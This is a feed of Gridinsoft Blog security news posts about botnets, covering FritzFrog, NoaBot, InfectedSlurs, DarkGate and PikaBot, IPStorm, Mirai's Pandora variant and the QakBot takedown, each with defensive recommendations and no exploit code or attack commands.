Botnet Archives – Gridinsoft Blog https://gridinsoft.com/blogs/tag/botnet/ Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Fri, 02 Feb 2024 15:33:00 +0000 en-US hourly 1 https://wordpress.org/?v=81515 200474804 New FritzFrog Botnet Sample Exploits Log4Shell and PwnKit https://gridinsoft.com/blogs/fritzfrog-botnet-exploits-log4shell-pwnkit/ https://gridinsoft.com/blogs/fritzfrog-botnet-exploits-log4shell-pwnkit/#respond Fri, 02 Feb 2024 15:33:00 +0000 https://gridinsoft.com/blogs/?p=19338 Researchers detected a new sample of FritzFrog malware, that is known for creating significant botnets. The new threat sample includes the functionality to exploit flaws in network assets, including the infamous Log4Shell vulnerability. As it turns out, even 2 years past the discovery and feverish updating, there are quite a few instances vulnerable to such… Continue reading New FritzFrog Botnet Sample Exploits Log4Shell and PwnKit

The post New FritzFrog Botnet Sample Exploits Log4Shell and PwnKit appeared first on Gridinsoft Blog.

]]>
Researchers detected a new sample of FritzFrog malware, that is known for creating significant botnets. The new threat sample includes the functionality to exploit flaws in network assets, including the infamous Log4Shell vulnerability. As it turns out, even 2 years past the discovery and feverish updating, there are quite a few instances vulnerable to such attacks.

FritzFrog Botnet is Back, Spreads with Exploitation of Web Vulnerabilities

The research from Akamai Labs uncovers a version of FritzFrog malware, armed with a set of exploitation capabilities. In the report they pay a lot of attention to its Log4Shell vulnerability exploitation, which is performed in a rather unusual manner. Upon the discovery of this flaw, all corporations were concentrated on patching main elements of the network infrastructure. At the same time, all the internal network components based off the Apache’s Log4j were mostly ignored, as they are less likely to be attacked. Well, until now.

By abusing the lack of input sanitization during logging, FritzFrog is able to make the target to execute the arbitrary code. Prior to it, malware scans for the vulnerable network assets by searching on ports 9000, 8090 and 8888. To make the vulnerable app instance execute the malicious code, malware spams it with HTTP requests with the said code injected into the request header. This way, the threat ensures that at least one command will make its way to the logs and will be further executed.

HTTP header Log4J exploit
Example of an HTTP header, sent by a malicious LDAP server. Every part of the header contains the malicious request

Aside from the Log4Shell flaw, the malware also gained the ability to exploit the PwnKit – a flaw in polkit, the privileges control utility present in the majority of Linux distributions. Abusing this flaw, FritzFrog makes itself run with highest privileges possible, shall it detect less than max privileges level assigned upon execution.

What is FritzFrog?

FritzFrog is a rather old malware sample, which has been traced since March 2020. Being a peer-to-peer botnet tool, it quickly gained a significant number of attacks. Though all this rapid success was only to cease the activity in September 2020. In December of the same year it resurrected with even more violent activity – and appears to be active ever since.

FritzFrog statistics 2020

Since its first days, it was using SSH brute forcing for self-propagation. It is actually surprising how many hosts open to Internet connections have weak login credentials even today. After the successful exploitation, FritzFrog was starting to scan thousands of other IP addresses, seeking for other weakly protected servers. Aside from self-propagation, the malware is capable of delivering other malware, providing remote access to the infected environment, and performing DDoS attacks.

Protection Against SSH-Targeting Malware

Besides having a rather unique spreading approach, FritzFrog infection vectors are nothing new. Attacking weakly protected servers through brute forcing is a several-decades-old tactic, and both of the vulnerabilities are from 2021. Patches for both flawed software packages are available – update them, and FritzFrog will have much less chances to get in, along with other software.

Methods to counteract SSH brute force are well known and easy to implement, too. Either set the instances to accept only trusted connections, or make them work on a different port. Strong passwords will add to overall security, but will not solve the server overload due to the enormous amount of login requests during a brute force attack. All security measures should work together – this makes them much more effective.

New FritzFrog Botnet Sample Exploits Log4Shell and PwnKit

The post New FritzFrog Botnet Sample Exploits Log4Shell and PwnKit appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/fritzfrog-botnet-exploits-log4shell-pwnkit/feed/ 0 19338
NoaBot Botnet: The Latest Mirai Offspring https://gridinsoft.com/blogs/noabot-botnet-the-latest-mirai-offspring/ https://gridinsoft.com/blogs/noabot-botnet-the-latest-mirai-offspring/#respond Thu, 11 Jan 2024 19:34:58 +0000 https://gridinsoft.com/blogs/?p=18950 A new botnet called NoaBot emerged in early 2023. It reportedly targets SSH servers for cryptocurrency mining using the Mirai platform. On top of the Mirai’s functionality, it brings several detection evasion tricks. NoaBot Involved in Crypto Mining Cybersecurity experts have discovered a new botnet called NoaBot. It has been active since at least the… Continue reading NoaBot Botnet: The Latest Mirai Offspring

The post NoaBot Botnet: The Latest Mirai Offspring appeared first on Gridinsoft Blog.

]]>
A new botnet called NoaBot emerged in early 2023. It reportedly targets SSH servers for cryptocurrency mining using the Mirai platform. On top of the Mirai’s functionality, it brings several detection evasion tricks.

NoaBot Involved in Crypto Mining

Cybersecurity experts have discovered a new botnet called NoaBot. It has been active since at least the beginning of 2023, and the purpose of this botnet is illegal crypto mining. It is based on the Mirai botnet, a notorious malware for harnessing infected IoT devices for large-scale network attacks. Despite being a derivative, it keeps all the functionality of the Mirai – a thing that can barely be underestimated.

Malware activity image
Malware activity

NoaBot’s primary strategy involves an SSH scanner searching for vulnerable servers to brute-force and deploy an SSH public key, allowing remote access. However, unlike previous Mirai versions, NoaBot has unique features that make it difficult for antivirus software to detect. It is compiled with uClibc, which can cause it to be misidentified as an SSH scanner or generic trojan.

What’s Under the Hood of NoaBot?

As I’ve mentioned, NoaBot developed on the foundation of the infamous Mirai botnet, whose source code was leaked in 2016. At the core of NoaBot’s operations lies a modified version of the XMRig coin miner. Although it is an open-source and widely used cryptocurrency mining program with legitimate uses, it is also popular among attackers. Additionally, it is equipped with a wormable self-spreader and an SSH key backdoor. As a result, this enables it to download and execute additional binaries and extend its reach to new victims.

NoaBot’s lateral movement strategy revolves around SSH credentials dictionary attacks, exploiting weak or default passwords. What sets NoaBot apart in illicit crypto mining is the obfuscation of its configuration and the use of a custom mining pool. Thus, it conceals the miner’s wallet address and obscures the scheme’s profitability. The researchers suspect that the creators of NoaBot are also using pieces of code from a Rust-based P2PInfect worm, which emerged in July. The reason behind this hypothesis is that some samples of P2PInfect contain specific text and inside jokes that are also present in the NoaBot code, such as lyrics from game-related pop songs.

The screenshot of song lyrics in the code
The song lyrics in the code

Global Impact

Analysis of victimology reveals that honeypots were attacked by 849 different source IPs across 2023. Upon investigating their geolocation, it was found that the attacks were distributed relatively evenly across the globe. This could be attributed to the wormable nature of the malware, as every infected victim becomes an attacker. However, one particular hotspot of activity stood out, originating from China. This hotspot accounted for almost 10% of all the attacks observed across 2023 and was the most prominent hotspot.

Overall, miner botnets are not something new, although such a botnet targeting Linux machines and capable of self-spreading is rather unusual. Massive amounts of IoT devices that are susceptible to NoaBot can bring lots of profits to its creators. Smart fridges and washing machines have a relatively low calculation power, though the sheer volume of them will cover the difference.

Safety Recommendations

Since the attack involves plain old SSH credentials dictionary attacks, it would be logical to restrict arbitrary internet SSH access and use strong passwords. It will prevent malware from spreading via SSH. Additionally, you can block the known default and vulnerable ports hackers are usually trying to log in through. These two steps will already reduce the chance of malware deployment, regardless of the type and source.

The post NoaBot Botnet: The Latest Mirai Offspring appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/noabot-botnet-the-latest-mirai-offspring/feed/ 0 18950
InfectedSlurs Botnet Exploits Zero-Days to Spread Mirai Malware https://gridinsoft.com/blogs/infectedslurs-botnet-mirai-malware/ https://gridinsoft.com/blogs/infectedslurs-botnet-mirai-malware/#respond Mon, 27 Nov 2023 15:25:09 +0000 https://gridinsoft.com/blogs/?p=17960 The “InfectedSlurs Botnet,” a sophisticated cyber threat, has been uncovered by the Akamai SIRT in a recent development. This malware campaign utilizes zero-day exploits to propagate the notorious Mirai malware, posing a significant risk to vulnerable devices worldwide. InfectedSlurs Helps Mirai Botnet to Resurface The InfectedSlurs Botnet has strong ties to the infamous Mirai malware,… Continue reading InfectedSlurs Botnet Exploits Zero-Days to Spread Mirai Malware

The post InfectedSlurs Botnet Exploits Zero-Days to Spread Mirai Malware appeared first on Gridinsoft Blog.

]]>
The “InfectedSlurs Botnet,” a sophisticated cyber threat, has been uncovered by the Akamai SIRT in a recent development. This malware campaign utilizes zero-day exploits to propagate the notorious Mirai malware, posing a significant risk to vulnerable devices worldwide.

InfectedSlurs Helps Mirai Botnet to Resurface

The InfectedSlurs Botnet has strong ties to the infamous Mirai malware, specifically the older JenX Mirai variant. Mirai gained notoriety for recruiting Internet of Things (IoT) devices through unconventional methods, including the use of games like Grand Theft Auto. The Mirai code’s unchanged nature, evident in a side-by-side comparison of the April 2023 variant and the October 2023 campaign, suggests a lack of significant modifications.

Why are InfectedSlurs Attacks Unique?

The Akamai SIRT, utilizing its global network of honeypots, detected a surge in activity. It was targeting a seldom-used TCP port in late October 2023. Intriguingly, the attack began with a low frequency, escalating to a peak of 20 attempts per day before tapering off to an average of two to three attempts. The initial targets remained unidentified until November 9, 2023.

unique of infectedslurs attacks
InfectedSlurs malware spreading scheme

The attackers employed a unique approach, initiating an authentication attempt via a POST request. They followed by a command injection exploitation upon success. Through meticulous investigation, a specific HTTP exploit path and targeted port were identified. Initial confusion arose from an internet slang-rooted Server header in the HTTP response, initially leading to suspicions of a honeypot or prank.

Botnet Targets

Further analysis revealed that the exploited devices belonged to a specific niche: real-time streaming protocol (RTSP) enabled devices, particularly CCTV/NVR/DVR/security cameras. The attack exploited a zero-day vulnerability in NVR devices manufactured by a yet-unnamed company. Remarkably, default administrative credentials, commonly documented by the manufacturer, were utilized in the attack.

Simultaneously, a second zero-day exploit surfaced, affecting outlet-based wireless LAN routers designed for hotel and residential applications. The vendor, also unnamed, plans to release details in December 2023. With both vendors working on patches, the community is urged to remain vigilant.

Reacting to activity

The InfectedSlurs Botnet underscores the significance of proactive cybersecurity measures. The deployment of honeypots, as demonstrated by the Akamai SIRT, offers crucial insights into evolving threats.

  • Organizations are reminded of the importance of changing default passwords and staying informed about emerging cyber threats to bolster their defenses against sophisticated attacks.
  • We recommend that SOAR and SIEM systems be used to detect, stop, and block any further cyberattack attempts within the entire environment.
  • Policies such as zero-trust can prevent exploitation by identifying and blocking attacks that use even well-known and trusted software.
  • Installing patches regularly is crucial in ensuring your system’s security, as it contains fixes for known vulnerabilities. Neglecting this step renders any further advice ineffective.

The post InfectedSlurs Botnet Exploits Zero-Days to Spread Mirai Malware appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/infectedslurs-botnet-mirai-malware/feed/ 0 17960
DarkGate and Pikabot Copy the QakBot Malware https://gridinsoft.com/blogs/darkgate-pikabot-qakbot/ https://gridinsoft.com/blogs/darkgate-pikabot-qakbot/#respond Mon, 27 Nov 2023 10:56:41 +0000 https://gridinsoft.com/blogs/?p=17935 According to researchers, the phishing campaign promoting the DarkGate and PikaBot malware is carried out by the authors or successors of the QBot Trojan (aka QakBot). Information security specialists believe that this is currently the most complex phishing campaign that has appeared since the liquidation of QBot. Is Pikabot A New QakBot? In its report,… Continue reading DarkGate and Pikabot Copy the QakBot Malware

The post DarkGate and Pikabot Copy the QakBot Malware appeared first on Gridinsoft Blog.

]]>
According to researchers, the phishing campaign promoting the DarkGate and PikaBot malware is carried out by the authors or successors of the QBot Trojan (aka QakBot). Information security specialists believe that this is currently the most complex phishing campaign that has appeared since the liquidation of QBot.

Is Pikabot A New QakBot?

In its report, Cofense said that DarkGate and Pikabot’s tactics and methods are similar to previous QakBot (aka Qbot) campaigns. That is, it seems that Qbot operators simply switched to using new botnets and malware. Researchers write that QBot was one of the largest botnets. The spread of QBot was associated with email, and DarkGate and Pikabot are modular malware downloaders that have the same functions as QBot.

The similarity of the campaigns can be concluded based on the intercepted email flows as the initial infection. Also on URLs with unique patterns that limit user access, and the chain of infections is almost identical to the one we saw with the QakBot delivery. The malware families used also correspond to what can be called the QakBot legacy.Cofense experts explain.

Similarly to QBot, hackers use the new downloaders to gain initial access to victims’ networks. Then they carry out ransomware attacks, espionage and data theft. Interestingly, some cybersecurity experts predicted the possible return of malware.

Features of the phishing campaign of the QBot heirs

According to Cofense, this summer the number of malicious emails spreading DarkGate increased significantly. In October 2023, attackers switched to using Pikabot as their main payload. These phishing attacks begin with emails that appear to be a reply or forward related to a previously stolen discussion. This makes it more likely that recipients will view the message with more confidence.

Users who click on a URL from such an email go through a series of checks and are then prompted to download a ZIP archive. This archive contains a dropper that retrieves the final payload from a remote source.

Distribution of DarkGate and PikaBot
Example of a malicious email

The researchers note that the attackers experimented with several droppers to determine which one worked best, including:

  • JavaScript dropper for loading and executing PE or DLL;
  • Excel-DNA loader, based on an open-source project used to create XLL files. In this case it is used to download and run malware;
  • VBS loaders, which can execute malware via .vbs files in Microsoft Office documents or launch command line executables;
  • LNK downloaders, which use .lnk files to download and execute malware.

The final payload used in these attacks until September 2023 was DarkGate, which was replaced by PikaBot in October 2023.

How dangerous are DarkGate and PikaBot?

DarkGate is a modular malware that supports various types of malicious behavior. Its first appearance happened back in 2017, but it became available to masses only in the summer of 2023. This, eventually, ended up with a sharp increase in its distribution. Among key feautures, DarkGate boasts hVNC remote access, cryptocurrency mining and reverse shell creation. It allows for keylogging, stealing data from an infected machine.

In turn, PikaBot is a newer malware that first appeared in early 2023 and consists of a loader and a main module, with mechanisms to protect against debugging, VMs, and emulations. On the infected machine, it creates a system profile and sends the collected data to the control server, awaiting further instructions. In response, the server sends commands to load and execute modules in the form of DLL or PE files, shellcode or command line commands. All this makes PikaBot a universal tool.

What is QakBot notorious for?

QakBot, active since 2008, was originally a banking Trojan. But it has evolved over time into a powerful malware downloader capable of deploying additional payloads, stealing information, and enabling lateral movement. Qbot’s malicious campaigns are most likely linked to Russian hackers and they are constantly improving their malware distribution methods.

In 2020 the Qbot Trojan first entered the list of the most widespread malware in the world. And since then, the malware had continiously hit the newsletters for the next 3 years. Among its most noticeable attack vectors is the adoption of 0-day vulnerability in Windows MSDT called Follina.

However, the FBI, in collaboration with a number of international law enforcement organizations, conducted Operation Duck Hunt, which resulted in the destruction of the QBot (QakBot) infrastructure in August 2023.

The FBI managed to penetrate the lair of a cybercriminal group and take possession of the computer of one of its leaders. After this through the gaming platform of QBot FBI sent out a botnet destruction program to the affected devices. After which the malware was removed from more than 700 thousand infected devices around the world. But, as we see, the legacy of the botnet QBot lives on.

DarkGate and Pikabot Copy the QakBot Malware

The post DarkGate and Pikabot Copy the QakBot Malware appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/darkgate-pikabot-qakbot/feed/ 0 17935
IPStorm Botnet Stopped by the FBI, Operator Detained https://gridinsoft.com/blogs/ipstorm-botnet-stopped-fbi/ https://gridinsoft.com/blogs/ipstorm-botnet-stopped-fbi/#respond Thu, 16 Nov 2023 14:35:08 +0000 https://gridinsoft.com/blogs/?p=17724 The FBI has successfully dismantled the notorious IPStorm botnet and apprehended its operator. The operation took place back in September, with the key operator, Sergei Makinin, detained around this time. FBI Dismantles IPStorm Botnet The Federal Bureau of Investigation has successfully suspended the activity of the notorious IPStorm botnet. As a result, they have ended… Continue reading IPStorm Botnet Stopped by the FBI, Operator Detained

The post IPStorm Botnet Stopped by the FBI, Operator Detained appeared first on Gridinsoft Blog.

]]>
The FBI has successfully dismantled the notorious IPStorm botnet and apprehended its operator. The operation took place back in September, with the key operator, Sergei Makinin, detained around this time.

FBI Dismantles IPStorm Botnet

The Federal Bureau of Investigation has successfully suspended the activity of the notorious IPStorm botnet. As a result, they have ended the widespread threat it posed to thousands of infected devices globally. The operator behind this nefarious network, Sergei Makinin, is a Russian and Moldovan national who has been arrested. He later confessed to accumulating over half a million dollars by selling access to compromised devices.

Initiated by Makinin in 2019, the IPStorm botnet boasted a formidable network of over 20,000 infected computers during its lifetime. This illegal infrastructure allowed threat actors to clandestinely route traffic through compromised devices. IPStorm runs on Windows, Linux, Mac, and Android operating systems, effectively evading detection by security measures.

IPStorm Botnet Timeline

As I said above, from June 2019 to December 2022, Makinin developed the IPStorm malware. This malware was designed to spread across devices globally and establish control over the infected electronics, effectively knitting them into a cohesive botnet. The primary objective of this botnet was to convert compromised devices into proxies. It appears that he succeeded in his objective. Makinin facilitated access to these proxies through dedicated websites, proxx.io, and proxx.net, creating a lucrative marketplace for cybercriminals seeking covert and untraceable communication channels.

Statistics by Intenzer
IPStorm botnet samples gathered by Intenzer, that show its starting date

The DoJ elucidated that Makinin offered access to more than 23,000 infected devices, referred to as proxies, charging substantial amounts, often hundreds of dollars per month, for the privilege. The illicit venture proved highly profitable for the operator, with Makinin admitting to amassing at least $550,000 in revenue from renting out the IPStorm botnet. This revelation underscores the financial motivation behind creating and maintaining such sophisticated cyber threats. In a significant development related to the case, Makinin pleaded guilty to seizing control of thousands of electronic devices worldwide and profiting by selling unauthorized access to these compromised systems, according to the US Department of Justice (DoJ).

Legal Actions and Continuing Threats

Although the IPStorm botnet has been taken down, it’s worth noting that the legal efforts didn’t cover the IPStorm malware that still exists on infected devices. Consequently, the malware still threatens compromised systems even though the botnet is now incapacitated. Contrary to one of the previous successful FBI operations against botnets, namely QakBot, they did not command the malware to delete itself from devices.

Either way, the recent target picking strategy of the FBI is obvious. It may sometimes be particularly difficult to behead relatively small and scattered ransomware groups. Meanwhile, humongous botnets that serve ransomware actors and hackers of many other direction are a much easier yet still effective target.

IPStorm Botnet Stopped by the FBI, Operator Detained

The post IPStorm Botnet Stopped by the FBI, Operator Detained appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/ipstorm-botnet-stopped-fbi/feed/ 0 17724
IoT Malware Attacks Grow by 400% in 2023 https://gridinsoft.com/blogs/iot-malware-attacks-400-percent-growth/ https://gridinsoft.com/blogs/iot-malware-attacks-400-percent-growth/#respond Mon, 30 Oct 2023 13:37:21 +0000 https://gridinsoft.com/blogs/?p=17367 IoT malware has been a major concern over the last decade. However, trends show that things are turning even worse – recent ZScaler research shows a 400% growth in IoT malware attacks in 2023 only. And most likely, it will become worse. Massive jump in attacks on IoT infrastructure According to the study, the number… Continue reading IoT Malware Attacks Grow by 400% in 2023

The post IoT Malware Attacks Grow by 400% in 2023 appeared first on Gridinsoft Blog.

]]>
IoT malware has been a major concern over the last decade. However, trends show that things are turning even worse – recent ZScaler research shows a 400% growth in IoT malware attacks in 2023 only. And most likely, it will become worse.

Massive jump in attacks on IoT infrastructure

According to the study, the number of IoT devices is growing, and obviously, the number of attacks grows along them. In the last six months alone, attacks on IoT devices have increased 400% year-to-year. Such a colossal figure, isn’t it? Although these devices were created for our convenience, cybercriminals think otherwise. The IoT, a vast network of interconnected devices, permeates our daily lives. However, if something has firmware that can be updated – sooner or later, cybercriminals will find a way to use it for their dirty deeds.

Additionally, research shows that cybercriminals commonly target vulnerabilities that have been around for more than three years. Their target is obvious: creating vast botnets from infected devices. As for malware families, about 66% are backdoors – ones that support botnet creation. For example, the leader is the Mirai botnet, with a 45.9% share. The next one is Gafgyt, which accounts for 20.3% of all infected devices. The main scenario of using such botnets is organizing DDoS attacks against enterprises. Oftentimes, hackers offer their DDoS power for sale on the Darknet – and such a service retains high demand over the years.

Ranking of IoT malware types diagram
Ranking of IoT malware types

Manufacturing Is The Most Targeted Industry

Today, the manufacturing sector is nearly triple the rate of other industries in terms of unique IoT devices. This dramatic growth indicates the industry’s desire to adopt advanced automation and digitization. As this “digitalization” involves adding smart sensors and devices, it expands the attack surface. Not surprisingly, the manufacturing sector receives more than three times as many attacks as any other sector in an average week, accounting for 54.5% of malware attacks.

The problem is that some IoT devices are built for ease of use and accessibility rather than security. This means they may have security vulnerabilities that attackers can exploit. Attacks on OT infrastructure can cause significant disruptions to critical industrial operations, disrupt critical OT processes, and, in some cases, even threaten lives. These are primarily the automotive, heavy manufacturing, plastics, and rubber industries.

Which Countries are at IoT Malware Risk?

According to the report, the U.S., Mexico, Brazil, and Colombia are the most commonly targeted countries. While 96% of IoT malware spreads from compromised IoT devices in the U.S., three of the four most affected countries are in Latin America. This abundance of infected devices in the States is because the U.S. has a high level of IoT integration. In addition to regular users, these devices are connected to critical infrastructure or enterprises. This motivation makes cybercriminals attempt to profit by compromising them.

Latin American countries are particularly vulnerable to IoT malware attacks. For example, Mexico accounts for 46% of all infections. This is due to relatively low levels of cybersecurity awareness and preparedness, as well as proximity to the U.S. The education sector has recently become a prime target for cybercriminals. It’s related to the widespread use of unsecured and shadow IoT devices in school networks. These devices give attackers more accessible access points to sensitive personal data stored on educational institutions’ networks. As a result, the rate of cyber attacks in this sector has increased by a staggering 961%, just shy of 1,000%. That’s not a good sign and demands immediate attention to protect the privacy and security of students, faculty, and staff.

How to Protect Against IoT Malware?

While there is no perfect defense, there are preventative measures that can help avoid most of these problems. The following recommendations will reduce the risk of device compromise:

  • Train employees on IoT device security. Forewarned is forearmed. Because humans are the weakest link in the line of defense, training employees in cybersecurity is an effective measure.
  • Use a zero-trust policy. A zero-trust philosophy eliminates any cybersecurity cronyism. This means that all devices and users are considered untrusted by default. Any unauthorized shadow IoT devices will be blocked from corporate data by proxy.
  • Maintain comprehensive visibility into IoT devices. Keeping your IoT devices secure is essential to knowing all devices connected to your network and what they’re doing, including unmanaged ones. The best way to do this is to use solutions that analyze network logs, which can help you monitor communications and activity.
  • Use multi-factor authentication. It adds another one layer of security by requiring users to enter a secondary mode of verification in addition to their password. This can prevent attackers from accessing user accounts if credentials are obtained, stopping lateral threat movement from compromised user devices.

The post IoT Malware Attacks Grow by 400% in 2023 appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/iot-malware-attacks-400-percent-growth/feed/ 0 17367
Mirai variant “Pandora” infects Android TV for DDoS attacks. https://gridinsoft.com/blogs/mirai-pandora-infects-android-os/ https://gridinsoft.com/blogs/mirai-pandora-infects-android-os/#respond Sat, 09 Sep 2023 12:07:20 +0000 https://gridinsoft.com/blogs/?p=16826 A new variant of the Mirai malware botnet has been detected, infecting low-cost Android TV set-top boxes. They are extensively used for media streaming by millions of people. The present Trojan is a fresh edition of the ‘Pandora’ backdoor initially identified in 2015, per the analytics. The campaign targets low-cost Android TV boxes such as… Continue reading Mirai variant “Pandora” infects Android TV for DDoS attacks.

The post Mirai variant “Pandora” infects Android TV for DDoS attacks. appeared first on Gridinsoft Blog.

]]>
A new variant of the Mirai malware botnet has been detected, infecting low-cost Android TV set-top boxes. They are extensively used for media streaming by millions of people. The present Trojan is a fresh edition of the ‘Pandora’ backdoor initially identified in 2015, per the analytics.

The campaign targets low-cost Android TV boxes such as Tanix TX6, MX10 Pro 6K, and H96 MAX X3. These devices have quad-core processors that can launch powerful DDoS attacks, even in small swarm sizes.

Mirai Botnet Aims Android-based TV Boxes

Mirai Botnet can infect devices via malicious firmware updates signed with publicly available test keys or malicious apps. Which undoubtedly distributed on domains that target users interested in pirated content. In the first case, firmware updates are either installed by resellers of the devices or users are tricked into downloading them from websites. Then, they promise unrestricted media streaming or better application compatibility.

The ‘boot.img‘ file contains the kernel and ramdisk components loaded during Android boot-up. It makes it an excellent persistence mechanism for the malicious service.

Mirai service
Malicious service

The second distribution channel involves the use of pirated content apps. They also offer access to collections of copyrighted TV shows and movies for free or at a low cost. Security experts have identified Android apps that spread the new Mirai malware variant to infected devices. Here is an example:

Android apps
Site dropping malware

In this case, the malicious apps surreptitiously start the ‘GoMediaService‘ during the initial launch and set it to auto-start when the device boots up.

When the ‘gomediad.so‘ service is called, it unpacks multiple files, including a command-line interpreter that runs with elevated privileges (‘Tool.AppProcessShell.1‘) and an installer for the Pandora backdoor (‘.tmp.sh‘).

gomediad.so
GoMedia service structure

After being activated, the backdoor establishes communication with the C2 server, and replaces the HOSTS file. After that, it updates itself and then enters standby mode, waiting for instructions from its operators. The malware can launch DDoS attacks using the TCP and UDP protocols, such as generating SYN, ICMP, and DNS flood requests. It can also open a reverse shell, mount system partitions for modification, and perform other functionalities.

IoC Mirai Botnet

What devices are at risk?

Budget-friendly Android TV boxes often have an uncertain journey from manufacturer to consumer. It leaves the end-user unaware of their origins, potential firmware modifications, and the various hands they’ve been through.

Even cautious consumers who retain the original ROM and are selective about app installations face a lingering risk of preloaded malware on their devices. It is advisable to opt for streaming devices from trusted brands like Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick.

Safety recommendations

For Android TV users, installing apps only from the official app store is advisable. It is also essential to pay attention to the permissions requested by the app. If your app requests access to your phonebook and geo-location, it is best to avoid using it as it could be malware. Additionally, it is crucial not to download or install any hacked apps, as their contents are often infected with malware of some kind.

The post Mirai variant “Pandora” infects Android TV for DDoS attacks. appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/mirai-pandora-infects-android-os/feed/ 0 16826
QakBot Botnet Dismantled, But Can It Return? https://gridinsoft.com/blogs/qakbot-dismantled-return/ https://gridinsoft.com/blogs/qakbot-dismantled-return/#respond Thu, 07 Sep 2023 09:32:33 +0000 https://gridinsoft.com/blogs/?p=16730 On Tuesday, the US authorities announced that as a result of the international law enforcement operation “Duck Hunt,” the infamous Qakbot malware platform, which is linked to Russia, was destroyed. Cybercriminals actively use it to commit various financial crimes. Though, cybersecurity experts are not sure how deadly this operation was to the botnet. They predict… Continue reading QakBot Botnet Dismantled, But Can It Return?

The post QakBot Botnet Dismantled, But Can It Return? appeared first on Gridinsoft Blog.

]]>
On Tuesday, the US authorities announced that as a result of the international law enforcement operation “Duck Hunt,” the infamous Qakbot malware platform, which is linked to Russia, was destroyed. Cybercriminals actively use it to commit various financial crimes. Though, cybersecurity experts are not sure how deadly this operation was to the botnet. They predict a soon return of Qakbot, with new tactics and tricks.

The United States and its allies dismantled the Qakbot financial fraud network

Last week, the United States, the United Kingdom, Germany, Latvia, the Netherlands, Romania, and France conducted a joint operation to dismantle the Qakbot hacker network. First appearing more than a decade ago, Qakbot typically spread through infected emails sent to potential victims under the guise of trusted messages. Cybersecurity researchers have suggested that Qakbot’s origins refer to Russia. This network of attackers has attacked various organizations worldwide, from Germany to Argentina, causing significant losses. U.S. Attorney Martin Estrada emphasized that this operation to expose and disrupt Qakbot’s “Duck Hunt” activities is the most extensive in the history of the fight against botnets.

Screenshot of malicious attachment that asks you to activate macros
Malicious attachment that asks you to activate macros

A colossal catch

So, specialists call Operation “Duck Hunt” a significant victory in the fight against cybercrime, and that’s obvious. As part of an international operation, FBI officials dismantled the Qakbot botnet that infected over 700,000 compromised computers worldwide, of which more than 200,000 were in the United States. Although authorities distributed a removal tool to the endpoints that removed Qakbot from system memory, this did not neutralize other malware that may have been present on the system. According to investigators, between October 2021 and April 2023, Qakbot administrators received approximately $58 million in ransom paid by victims. According to CertiK, criminals could steal about $45 million worth of cryptocurrency during August this year. And in total, users have lost $997 million in fraudulent schemes since the beginning of the year. Law enforcers seized more than $8.6 million in bitcoins.

A few words about Qakbot

Qakbot is a malicious program that belongs to the TrickBot family of Trojans. Its functionality is similar to a Swiss Army knife. It was first discovered in 2008, and since then, cybercriminals have actively used it to steal data and spread other malicious programs. It is the most frequently detected malware, with 11% of corporate networks worldwide affected in the first half of 2023. The victims ranged from financial institutions on the East Coast to a critical infrastructure government contractor in the Midwest to a medical device manufacturer on the West Coast. It also served as a platform for ransomware operators. Once infected, the victim’s computer became part of a giant Qakbot botnet, infecting even more victims. Qakbot can spread through various channels, including email, malicious links, and infected files. We have an entire article dedicated to this malware.

QakBot May Resurface Soon, Analysts Concern

Experts of cyber threat intelligence operations warned that the recent takedown of Qakbot may only provide short-term relief in the fight against cybercrime. Many cybercrime service providers operate from Russia, which doesn’t extradite its citizens, making it difficult to reach them. However, now Qakbot appears to be on a forced sabbatical. Nevertheless, cybercriminals may tweak their code to make it more challenging to disrupt in the future. The situation now resembles the events with Emotet, which, after severe destruction in 2021, was never able to regain its former position.

Despite obvious parallels to Emotet’s case, it is important to notice the difference between the two. Spreading methods applied by Emotet differ from ones used by Qakbot. The latter used email spamming only as a part of lateral movement, with the application of compromised email accounts. Moreover, QBot is backed by a team of highly-professional crimes, while Emotet apparently lost its dream team in the 2021’s detention. Conti’s Team 3, now known as Black Basta, ran Qakbot operations alongside the Clop ransomware group. Team 3 has been inactive since June, but once they resurface, they could pose a potent threat.

How to protect yourself against malware?

Protecting yourself against malware is essential to safeguard your personal information, data, and online security. Here are some fundamental steps to help you stay protected:

  • Beware of Fake Websites. You should be cautious when visiting websites, especially when entering sensitive information. Ensure you’re on secured websites (look for HTTPS in the URL).
  • Exercise Caution with Email and Links. Be cautious when opening email attachments and clicking links, especially in emails from unknown or suspicious sources. Malware often spreads through phishing emails. Be skeptical of pop-up ads and unexpected download prompts. Verify the legitimacy of requests before taking action.
  • Download Software from Official Sources. Only download software and apps from reputable sources, e.g., the official website or app store (If it’s Android or iOS). Avoid downloading cracked or pirated software from torrents, often bundled with malware.
  • Keep Software Updated. You may find Windows updates annoying, but it is essential. Regularly update your operating system, web browsers, and all installed software. Many malware attacks exploit known vulnerabilities that are patched through updates.
  • Use Strong Passwords. A strong password is the first line of defense. Create strong, unique passwords for your accounts, and change them regularly. Consider using a password manager to generate and store complex passwords securely.
  • Enable Multi-Factor Authentication (MFA). Whenever possible, enable MFA for your online accounts. This is the second line of defense, which will stop the intruder if the first line is passed. MFA adds an extra layer of security by requiring additional verification beyond a password.
  • Use Reputable Anti-Malware Software. We recommend installing and regularly updating reputable anti-malware software on your devices. This point complements all previous topics and minimizes all risks as much as possible. These tools can detect and remove malware infections.

The post QakBot Botnet Dismantled, But Can It Return? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/qakbot-dismantled-return/feed/ 0 16730
Qakbot Botnet Hacked, Removed from Over 700,000 Machines https://gridinsoft.com/blogs/qakbot-hacked-removed-from-700k-machines/ https://gridinsoft.com/blogs/qakbot-hacked-removed-from-700k-machines/#comments Fri, 01 Sep 2023 11:56:52 +0000 https://gridinsoft.com/blogs/?p=16659 Qakbot, a notorious botnet, has been taken down by a multinational law enforcement operation spearheaded by the FBI, Operation “Duck Hunt”. The botnet, also called Qbot and Pinkslipbot, that considered one of the largest and longest-running botnets to date. According to conservative estimates, law enforcement officials have linked Qakbot to at least 40 ransomware attacks.… Continue reading Qakbot Botnet Hacked, Removed from Over 700,000 Machines

